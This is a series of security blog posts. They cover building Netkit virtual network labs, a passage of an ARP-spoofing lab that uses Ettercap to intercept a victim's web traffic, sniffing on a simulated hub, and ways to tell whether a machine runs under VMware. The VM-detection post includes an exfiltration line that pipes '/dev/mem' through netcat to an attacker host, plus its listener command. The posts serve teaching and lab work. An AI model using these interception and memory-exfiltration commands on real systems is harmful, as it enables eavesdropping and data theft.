This script configures a bridge after Switch machine boot by incorporating the bridge ports eth0, eth1 and eth2 and also activating the spanning-tree (unnecessary in this case because there is only one switch but it is a habit we should have) .

Startup commands of the rest of the machines are easier because all they do is start the network service:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat Router.startup /etc/init.d/networking start dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat PC-Alice.startup /etc/init.d/networking start dante@Hades:~/netkit_labs/lab_sniffing_sw $ cat PC-Sniffer.startup /etc/init.d/networking start

This example is very simple, but thanks to these scripts we can do that a laboratory configures itself without the end user having to do anything. In fact, the best is to configure the IP addresses of the interfaces and routes through these scripts instead of copying the configuration files in the /etc of each machine, but taking that detour gave me the opportunity to explain how to input files in the directory tree of virtual machines.

Now, finally, it's time to start our laboratory. The laboratories are started with the order lstart and stopped with lhalt. Let's see what happens in our case:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ sudo lstart [sudo] password for dante: 033[1m======================== Starting lab ===========================033[0m Lab directory: /home/dante/netkit_labs/lab_sn iffing_sw Version: 0.1 Author: Dante Email: dante.signal31@gmail.com Web: http://danteslab.blogspot.com/ Description: Laboratorio para simular un ataque de ARP-Spoofing 033[1m=================================================================033[0m 033[1mStarting "PC-Alice" with options "-q --mem=100 --eth0 CD-A --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/ho me/dante/netkit_labs/lab_sniffing_sw"... 033[0m 033[1mStarting "PC-Sniffer" with options "-q --mem=100 --eth0 CD-C --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/hom e/dante/netkit_labs/lab_sniffing_sw"... 033[0m 033[1mStarting "Router" with options "-q --mem=100 --eth1 CD-B --eth0 tap,192.168.10.1,192.168.10.2 --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/home/dante/netkit_labs/lab_sniffing_sw"... 033[0m 033[1mStarting "Switch" with options "-q --mem=100 --eth1 CD-A --eth2 CD-C --eth0 CD-B --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/home/dante/netkit_labs/lab_sniffing_sw"... 033[0m 033[1mThe lab has been started.033[0m 033[1m===================== ============================================033[0m dante@Hades:~/netkit_labs/lab_sniffing_sw$

To check that the resulting network works we can try surfing the Internet with lynx from PC-Alice:


Now that we have checked that our network works we can give our laboratory an use performing the experiment mentioned at the beginning of the article: An ARP -Spoofing attack against Alice from PC - Sniffer .

As you can see in the photo above, PC - Sniffer has activated a tcpdump , but only see the traffic spanning tree (STP) issued by the switch. Unlike previous article network in which I simulated a hub, this switch does not replicate traffic on all ports but only on the port that connects the destination of the data.

To spy traffic between Router and PC- Alice we will have to place ourselves between them making them believe they talk each other when actually they do with PC- Sniffer .

We will use Ettercap tool, which is installed by default in Debian that brings Netkit (if not, you could install it with a simple " #aptitude install ettercap" , as we would in our real PC) . Ettercap allows interception on switched networks . It really is a little wonder that deserves an article to itself . Here we will use Ettercap from PC-sniffer to spy Alice web traffic . To activate an ARP -Spoofing attack (also called ARP- Poisoning) with Ettercap the order would be:

PC-Sniffer# ettercap -M arp:remote -T /192.168.0.1/ /192.168.0.2/

Immediately PC-Sniffer screen start draining the contents of the data exchanged between PC-Alice and her gateway, Router, while browsing the Internet:


To stop the lab you just have to do "sudo lhalt " from the root directory of the lab (where we formerly launched  lstart ) . If we wanted to relaunch the laboratory we must take into account the need to put back the path to the virtual network which disappeared when lhalt disabled the tap interface. On the other hand, lstart created .disk files in the lab folder to not to lose the programs you have installed on virtual machines or any other changes we have made. That means that the folders where we placed configuration files are no longer read so if you want to put new files there first you have to delete the .disk files and do a Netkit lstart to re-read those folders. There is another useful option to transfer files to and from virtual machines using the /hosthome folder that there is in all virtual machines which mounts the user's home that launched the Netkit .

In another article I will explain how Ettercap works and other interception techniques . This article  served to demonstrate the utility of Netkit to simulate the complex networks that make computer security experiments possible with a considerable saving in both effort and money and space. It is also an invaluable aid for those who intend to teach the art of computer security, allowing us to offer our readers preconfigured laboratories to let student focus exclusively on the techniques explained without having to waste time setting up a test network on their own. Thats why, my further articles will include links to Netkit laboratories especially designed to train in a way fast and simple what is explained in them.

12 October 2013

Creating virtual laboratories with Netkit (I)

Progress in the field of security engineering requires constant learning in multiple disciplines . This learning is largely theoretical but to be fully effective need to be implemented. A security engineer should be able to put himself in an attacker boots and foresee with reasonable certainty what could be his next step . But this is difficult because an engineer can not go around attacking networks with the excuse that he is learning how bad guys work .

Until recently, the only option available for students of security was to set up a laboratory at home collecting low-cost computers and network equipment . Unfortunately this was expensive , consuming an increasingly scarce space in modern homes and placed your partner / spouse / father / mother against you because they didn´t understand the utility of that. Fortunately , the era of virtualization came to the rescue so today is possible to assemble complex virtual laboratories within our computer.

The easiest option are VMWare or VirtualBox, which are ideal for testing tools, rootkit, vulnerability, etc. on different operating systems without endangering our own computer. Starting several of these virtual machines can test simulating a LAN network. Even there are tutorials to simulate more complex topologies using VMWare. However, at that point carry such tools may require consume an amount of computer resources that may not count on.

The other option is called Netkit , developed at the University of Rome. The focus is not so much the specific equipment emulation but complete networks . Netkit allows us to define a network topology and test with it. To do that we would begin a series of nodes that are only light Debian Linux virtual instances and we would configure them as the role they play within the network we want to simulate ( router , switch or end device ) .

Installation is very simple . First, download three files :


Once downloaded must be unzipped all together in the directory of your choice ( we assume that /usr/share/netkit ) ( see update at end of article ) and then prepare a few environment variables to record where we installed the Netkit . To do this, it is best to add at the end of /etc /profile the following lines :
NETKIT_HOME="/usr/share/netkit"
MANPATH="$MANPATH:$NETKIT_HOME/man"
PATH="$PATH:$NETKIT_HOME/bin"
export NETKIT_HOME MANPATH PATH
Once this is done you have to restart the computer to run the environment variables you just configured. And that it is, to check if anything fails test run a script that includes netkit:
dante@Hades:/usr/share/netkit$ ./check_configuration.sh > Checking path correctness... passed. > Checking environment... passed. > Checking for availability of man pages... passed. > Checking for proper directories in the PATH... passed. > Checking for availability of auxiliary tools: awk : ok basename : ok date : ok dirname : ok find : ok getopt : ok grep : ok head : ok id : ok kill : ok ls : ok lsof : ok ps : ok readlink : ok wc : ok port-helper : ok tunctl : ok uml_mconsole : ok uml_switch : ok passed. > Checking for availability of terminal emulator applications: xterm : found konsole : found gnome-terminal : not found passed. [ READY ] Congratulations! Your Netkit setup is now complete! Enjoy Netkit!

At this point begins the really interesting.

Let's start two virtual machines connected to the same collision domain (it is like they were connected to the same hub) and we will do ping between them:
dante@Hades:~/netkit_labs$ vstart --eth0=CD-A -M 100 PC-1 dante@Hades:~/netkit_labs$ vstart --eth0=CD-A -M 100 PC-2 dante@Hades:~/netkit_labs$ ls -l total 1136 -rw-r--r-- 1 dante dante 1074012160 2008-09-11 23:26 PC-1.disk -rw-r--r-- 1 dante dante 470 2008-09-11 23:25 PC-1.log -rw-r--r-- 1 dante dante 1074012160 2008-09-11 23:26 PC-2.disk -rw-r--r-- 1 dante dante 470 2008-09-11 23:26 PC-2.log

With the --eth0 parameter that interface is assigned to CD-A collision domain (we call them as we wish), and with the --M one  we are gping to give 100 MB of RAM to the machine. You can see that Netkit creates a .disk file for each virtual machine created, that disk is where you keep your file system. Each file system uses default 1'1GB so you better make sure you have free disk space before starting an experiment with many machines.

By doing vstart each xterm window appears with the virtual machine console that has been launched.


Here is where we are going to configure every machine:
PC-1:~# ifconfig eth0 192.168.0.1 netmask 255.255.255.0 up PC-2:~# ifconfig eth0 192.168.0.2 netmask 255.255.255.0 up

If now we ping between the two machines you  can see their reply .

Now let's do a simple experiment, so they do not say that this article has not been addressed security. Let's go back to over 10 years ago , when networks were based largely on hubs , ie when all the PCs on the network are connected to the same collision domain. In those days it was very easy to eavesdrop ( sniffing ) as hubs replicate everything they received from one port to other ports so if someone put the interface in promiscuous mode could prevent his network card to drop off packets not addressed to it and display them in a program like tcpdump. To simulate what an attacker would have done in those days we are going to create your PC in the same way as above but calling PC-3 and assigning the IP address 192.168.0.3 . This would be like connecting the PC the hub of spied victims. Now you start a tcpdump in PC -3 and see if we can capture the ping we are launching from PC-2 to PC-1:


As you can see from the picture we gave time to PC-2 to send two ping PC-1 and this has answered correctly. And what PC-3 has seen?, answer is all: the arp of PC-2, the response of PC-1, the ICMP-request of PC-2 (round pings) and ICMP-reply of PC-1 (pings back). In fact PC-3 has heard the whole "conversation" between PC-2 and PC-1. If this had not been a mere ping but a telnet session, PC-3 might have heard of the username and password of the person you passed from PC-2 to PC-1. Hence the importance of encrypting SSH terminal sessions.

To shut down the virtual machines, you can make a halt from within each of them or with vhalt from our actual command line:
dante@Hades:~/netkit_labs$ vhalt PC-1 Halting virtual machine "PC-1" (PID 29271) owned by dante [.... ] dante@Hades:~/netkit_labs$ vhalt PC-2 Halting virtual machine "PC-2" (PID 30824) owned by dante [.... ] dante@Hades:~/netkit_labs$ vhalt PC-3 Halting virtual machine "PC-3" (PID 28568) owned by dante [.... ] dante@Hades:~/netkit_labs$

If you would like to restart the machines then we should only use the command vstart (provided you have not deleted the .disk file) . For example, to boot PC-1 we would do: vstart PC-1

Well, not bad for a start, we have assembled an experiment with three PCs and a hub without having any of the four things ... Could not ask for more , does it? . In my next (or next ones ) article I'm going to delve into Netkit possibilities to develop more complex and interesting experiments .

Update 2010-01-01 : In his new version, Netkit has changed the file system ( Debian image that is loaded with each of the virtual machines ) to a 10 GB filesystem. Fortunately , if we use partitions with serious filesystems ( ext , ReiserFS , XFS , JFS and NTFS ) not to worry because it will treated as a sparse file and will not take even a fraction of that size. The only thing you should do is extract all files downloaded from the web of Netkit in /user/share/netkit using the command: sudo tar - xjSf being the S precisely to treat stracted files as sparse ones.

13 November 2011

Virtual Machine Detection

Virtualization has expanded strongly over recent years in the design of organizational systems, which is not surprising given the cost savings it offers, ease of scaling and fault tolerance. So much that now they are beginning to say that is better  for the backoffice to be based exclusively on virtualization solutions like those offered by VMware , Xen or VirtualBox, among others.However, these proposals tend to be based more on excitement from the marketing promises than on technical analysis in the cold.

Medium point is probably the most interesting and safe: continue to use physical machines to critical services and have virtualization support into play when a physical machine fails or as temporary support in case of saturation loading of a phisical farm. Another very interesting field of virtual machines is the test-lab during development work creating machines or cheating or honeypots . In any case, in my humble opinion, combining in one phisical machine virtualized servers from different levels of security is completely inadvisable given vulnerabilities are being discovered and bring into question the alleged isolation between the host machine and its virtual machines . In the event that such isolation is compromised, an attacker might try to jump from one level to another, avoiding the perimeter defenses or could compromise the machines hosted on the same virtualization platform.

Given these vulnerabilities begin to surface normal techniques to discover if a machine is or not part of a virtualization infrastructure. Discover that an intruder is in a virtual machine can be considered much more profitable to attack the phisical host machine than use the virtual machine as a bridge to the rest of the network. These techniques analyze the target machine in order to detect signs typical of a virtual machine. Such signs may be of different types: 


    • Issues in special processes, file systems and / or registration.
    • Issues in memory.
    • Virtual hardware.
    • Low-level instructions specific to virtual machines.

Throughout this article we will study each of these possible leads by the example of a VMware-based virtual machine, as the most widespread platform and to some extent, typical.

In the case of VMware, the process more easily detectable is VMtools . The VMtools are a pack of VMware's own tools, if installed in a virtual machine, increases graphics performance and establish a communication channel between the host and virtual machine so that you can use shared folders or drag -and-drop files. The problem is that all these features have a price and is posing a risk to the safety of the system to drive a wedge attack against the insulation between the host and the virtual machine. The fact is that the use of VMtools actives a service that is easily detectable in the table of virtual machine processes. Besides, a thorough analysis of the file system of a virtual machine shed more than 50 references to the words "vmware" and "vmx". The same can be said of the register (in the case of Windows) that would be "marked" with over 300 references to the word registration VMware.For all the above, VMtools should be avoided when possible just using them only after a proper risk analysis.

The second case, the memory footprint, is virtually impossible to avoid. If the virtual machine was Linux, an attacker could make a primary memory dump to analyze later in search of the word "vmware". This would not have to do more than the following:
attacker$ nc -l -p 2000 -o memory_dump_genesys 
victim$ sudo dd if=/dev/mem bs=100k | nc ip-atacante 2000
After downloading, dump analysis may be as simple as the following: 
attacker$ grep -ic vmware memory_dump_genesys
360
attacker$ grep -i vmware memory_dump_genesys 
<> 

The problem of this approach is its slownes as an attacker have to transmit the image from memory (several GB) through the network and the load on the attacked machine, which could alert administrators of intrusion.
Another option is to use specialized tools such as Scoopy, which can detect memory allocation patterns typical of virtualized machines.

As for the virtual hardware, the easiest case to detect the network card as it is unusual for the first 6 characters of the MAC point to the card manufacturer.On the Internet there are many search engines that allow to identify the ethernet card manufacturer based on its MAC. In the case of VMware virtual ethernet interfaces are marked with a MAC which is of type: 00:0 C: 29: xx: xx: xx.
Another case is that of hard disks becuse VMware enables virtualization of SCSI hard drives. A simple search on the boot logs alerts you that we have a virtual machine:

@ dante dante-desktop: ~ $ cat / var / log / messages | grep scsi
Mar 19 21:17:57 dante-desktop kernel: [83993.729650] scsi0: ata_piix
Mar 19 21:17:57 dante-desktop kernel: [83993.729955] scsi1: ata_piix
Mar 19 21:17:57 dante-desktop kernel: [83994.585470] scsi 1:0:0:0: CD-ROM PIONEER DVD-RW DVR-111D 1.23 PQ: 0 ANSI: 5
Mar 19 21:17:57 dante-desktop kernel: [83994.585847] scsi 1:0:1:0: CD-ROM IDE CDR11 VMware NECVMWar 1.00 PQ: 0 ANSI: 5
Mar 19 21:17:57 dante-desktop kernel: [83994.631853] sr0: scsi3-mmc drive: 40x/40x writer cd / rw cdda tray xa/form2
Mar 19 21:17:57 dante-desktop kernel: [83994.634815] sr1: scsi3-mmc drive: 1x/1x cdda tray xa/form2
Mar 19 21:17:57 dante-desktop kernel: [83994.648546] sr 1:0:0:0: Attached scsi generic sg0 type 5
Mar 19 21:17:57 dante-desktop kernel: [83994.648772] sr 1:0:1:0: Attached scsi generic sg1 type 5
Mar 19 21:17:57 dante-desktop kernel: [83994.931779] SCSI2: ioc0: LSI53C1030, FwRev = 01032920h, Ports = 1, MaxQ = 128, IRQ = 17
Mar 19 21:17:57 dante-desktop kernel: [83995.050997] scsi 2:0:0:0: Direct-Access VMware, VMware Virtual S 1.0 PQ: 0 ANSI: 2
Mar 19 21:17:57 dante-desktop kernel: [83995.063046] scsi 2:0:0:0: Attached scsi generic sg2 type 0
Mar 22 20:11:50 dante-desktop kernel: [88289.831746] scsi0: ata_piix
Mar 22 20:11:50 dante-desktop kernel: [88289.835558] scsi1: ata_piix
Mar 22 20:11:50 dante-desktop kernel: [88291.093663] scsi 1:0:0:0: CD-ROM PIONEER DVD-RW DVR-111D 1.23 PQ: 0 ANSI: 5
Mar 22 20:11:50 dante-desktop kernel: [88291.101227] scsi 1:0:1:0: CD-ROM IDE CDR11 VMware NECVMWar 1.00 PQ: 0 ANSI: 5
Mar 22 20:11:50 dante-desktop kernel: [88291.380171] SCSI2: ioc0: LSI53C1030, FwRev = 01032920h, Ports = 1, MaxQ = 128, IRQ = 16
Mar 22 20:11:50 dante-desktop kernel: [88291.504844] scsi 2:0:0:0: Direct-Access VMware, VMware Virtual S 1.0 PQ: 0 ANSI: 2
Mar 22 20:11:50 dante-desktop kernel: [88296.060604] sr0: scsi3-mmc drive: 40x/40x writer cd / rw cdda tray xa/form2
Mar 22 20:11:50 dante-desktop kernel: [88296.076810] sr1: scsi3-mmc drive: 1x/1x cdda tray xa/form2
Mar 22 20:11:50 dante-desktop kernel: [88296.159975] sr 1:0:0:0: Attached scsi generic sg0 type 5
Mar 22 20:11:50 dante-desktop kernel: [88296.160101] sr 1:0:1:0: Attached scsi generic sg1 type 5
Mar 22 20:11:50 dante-desktop kernel: [88296.160215] scsi 2:0:0:0: Attached scsi generic sg2 type 0

As if this were not clear enough, a simple call to command sdparm to confirm this point:

@ dante dante-desktop: ~ $ sudo sdparm-a / dev/sda1
/ Dev/sda1: VMware, VMware Virtual S 1.0 

In the end, we have proved that virtualization with VMware is not "anonymous". But there is still one lastl fireworks in that virtual hardware identification is concerned, it made hardware drivers identify the result is quite illuminating:

@ dante dante-desktop: ~ $ lspci-v
00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 01)
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 0

00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 01) (prog-if 00 [Normal decode])
Flags: bus master, 66MHz, medium devsel, latency 0
Bus: primary = 00, secondary = 01, subordinate = 01, sec-latency = 64

00:07.0 ISA bridge: Intel Corporation PIIX4 ISA 82371AB/EB/MB (rev 08)
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 0

00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01) (prog-if the 8th [Master CCA Prip])
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 64
[Virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size = 8]
[Virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size = 1]
[Virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size = 8]
[Virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size = 1]
I / O ports at 1050 [size = 16]

00:07.2 USB Controller: Intel Corporation 82371AB/EB/MB PIIX4 USB (prog-if 00 [UHCI])
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 64, IRQ 18
I / O ports at 1060 [size = 32]

00:07.3 Bridge: Intel Corporation PIIX4 ACPI 82371AB/EB/MB (rev 08)
Subsystem: VMware Inc virtualHW v3
Flags: medium devsel, IRQ 9

00:0 f.0 VGA compatible controller: VMware Inc [VMware SVGA II] PCI Display Adapter (prog-if 00 [VGA])
Subsystem: VMware Inc [VMware SVGA II] PCI Display Adapter
Flags: bus master, medium devsel, latency 64
I / O ports at 1440 [size = 16]
Memory at F0000000 (32-bit, non-prefetchable) [size = 128M]
Memory at e8000000 (32-bit, non-prefetchable) [size = 8M]
[Virtual] Expansion ROM at 20010000 [disabled] [size = 32K]

00:10.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 01)
Flags: bus master, medium devsel, latency 64, IRQ 16
I / O ports at 1080 [size = 128]
Memory at e8810000 (32-bit, non-prefetchable) [size = 4K]
[Virtual] Expansion ROM at 20018000 [disabled] [size = 16K]

00:11.0 Ethernet controller: Intel Corporation Gigabit Ethernet Controller 82545EM (Copper) (rev 01)
Subsystem: VMware Inc Unknown device 0750
Flags: bus master, 66MHz, medium devsel, latency 0, IRQ 17
Memory at e8820000 (64-bit, non-prefetchable) [size = 128K]
Memory at e8800000 (64-bit, non-prefetchable) [size = 64K]
I / O ports at 1450 [size = 8]
[Virtual] Expansion ROM at 20000000 [disabled] [size = 64K]
Capabilities: 

00:12.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 02)
Subsystem: Ensoniq Creative Sound Blaster AudioPCI64V, AudioPCI128
Flags: bus master? devsel, latency 64, IRQ 18
I / O ports at 1400 [size = 64] 


Scoopy's creator, Tobias Klein, also developed a tool, called Doo , able to detect virtual machines based on analysis similar to the ones in this article.

Finally, we have to mention the low-level instructions specific to virtual machines.Virtualization solutions introduce these instructions in order to facilitate communication between the VM and host. Tools like VMDetect use these instructions to detect when a machine is actually virtualized. What they do is to call these instructions, if there is an exception we have a physical machine, if instead the instruction is then executed at a machine we before a virtual one.

All these detection vectors should warn against the alleged infallibility of virtualization they try to sell through commercial channels. It is true that virtualization can bring significant benefits to organizations, but only if it is deployed properly and prudently or, otherwise, may lead, as with all human works, to disaster.